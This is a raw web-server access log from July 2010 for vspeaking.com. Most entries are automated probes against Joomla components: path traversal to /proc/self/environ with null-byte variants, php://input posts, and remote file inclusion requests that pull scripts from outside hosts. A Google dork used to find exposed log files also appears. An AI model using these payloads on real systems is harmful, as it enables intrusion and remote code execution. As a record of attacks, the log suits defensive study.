125.166.216.138 - - [26/Jul/2010:06:59:00 -0700] "GET /logs/access_100628.log HTTP/1.1" 200 2686976 "http://www.google.com/search?hl=en&q=filetype%3Alog+inurl%3A+%22password.log%22&aq=f&aqi=&aql=&oq=&gs_rfai=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.vspeaking.com"
125.166.216.138 - - [26/Jul/2010:06:59:04 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:08:03 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:08:04 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:08:04 -0700] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:08:05 -0700] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:07:08:40 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:07:08:41 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:07:08:41 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:07:08:52 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:07:08:52 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:07:08:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:17 -0700] "GET /logs/access.log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:17 -0700] "GET /logs/access.log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:17 -0700] "GET /logs/access.log/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:17 -0700] "POST /logs/access.log/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "GET /logs/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:07:12:18 -0700] "POST /logs/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
125.166.216.138 - - [26/Jul/2010:07:12:33 -0700] "GET /logs/access_100412.log HTTP/1.1" 301 - "http://www.google.com/search?hl=en&q=filetype%3Alog+inurl%3A+%22password.log%22&aq=f&aqi=&aql=&oq=&gs_rfai=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:07:14:42 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:07:14:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:07:14:42 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:07:15:58 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:15 -0700] "GET /logs/access.log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:16 -0700] "GET /logs/access.log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:17 -0700] "GET /logs/access.log/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:17 -0700] "POST /logs/access.log/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:17 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:18 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:18 -0700] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:18 -0700] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:19 -0700] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:19 -0700] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:19 -0700] "GET /logs/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
187.45.193.159 - - [26/Jul/2010:07:32:20 -0700] "POST /logs/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
218.234.23.94 - - [26/Jul/2010:07:32:24 -0700] "GET /logs/access_100517.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.23.94 - - [26/Jul/2010:07:32:25 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.23.94 - - [26/Jul/2010:07:32:25 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:07:33:38 -0700] "GET /logs/access.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:07:33:39 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:07:33:40 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
174.121.240.147 - - [26/Jul/2010:07:34:09 -0700] "GET /logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:07:43:11 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
92.0.142.95 - - [26/Jul/2010:07:45:36 -0700] "GET /logs/scripts.log HTTP/1.1" 200 561529 "http://skipbox.org" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:07:46:32 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
208.115.111.245 - - [26/Jul/2010:07:47:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
216.129.119.44 - - [26/Jul/2010:08:11:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:08:13:58 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [26/Jul/2010:08:13:58 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [26/Jul/2010:08:13:59 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
217.16.18.219 - - [26/Jul/2010:08:18:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:04 -0700] "GET /logs/access_100705.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:04 -0700] "GET /logs/access_100705.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:04 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:04 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:04 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:04 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:04 -0700] "GET /logs/access_100705.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:05 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:22:05 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:08:23:22 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:08:23:23 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:08:23:23 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:26:17 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:26:17 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:26:17 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:26:17 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:26:36 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:39 -0700] "GET /logs/access_100705.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bwitruck.com/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:40 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bwitruck.com/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:40 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bwitruck.com/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:41 -0700] "GET /logs/access_100705.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:42 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:42 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:26:44 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:47 -0700] "GET /logs/access_100705.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:50 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:26:53 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:27:01 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:27:02 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:27:22 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:27:51 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:27:51 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:27:51 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:27:51 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:28:23 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:28:23 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:32:24 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:32:26 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:32:41 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:32:42 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:33:10 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bwitruck.com/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
219.240.36.36 - - [26/Jul/2010:08:33:12 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.bwitruck.com/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
217.16.18.219 - - [26/Jul/2010:08:33:26 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
217.16.18.219 - - [26/Jul/2010:08:33:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
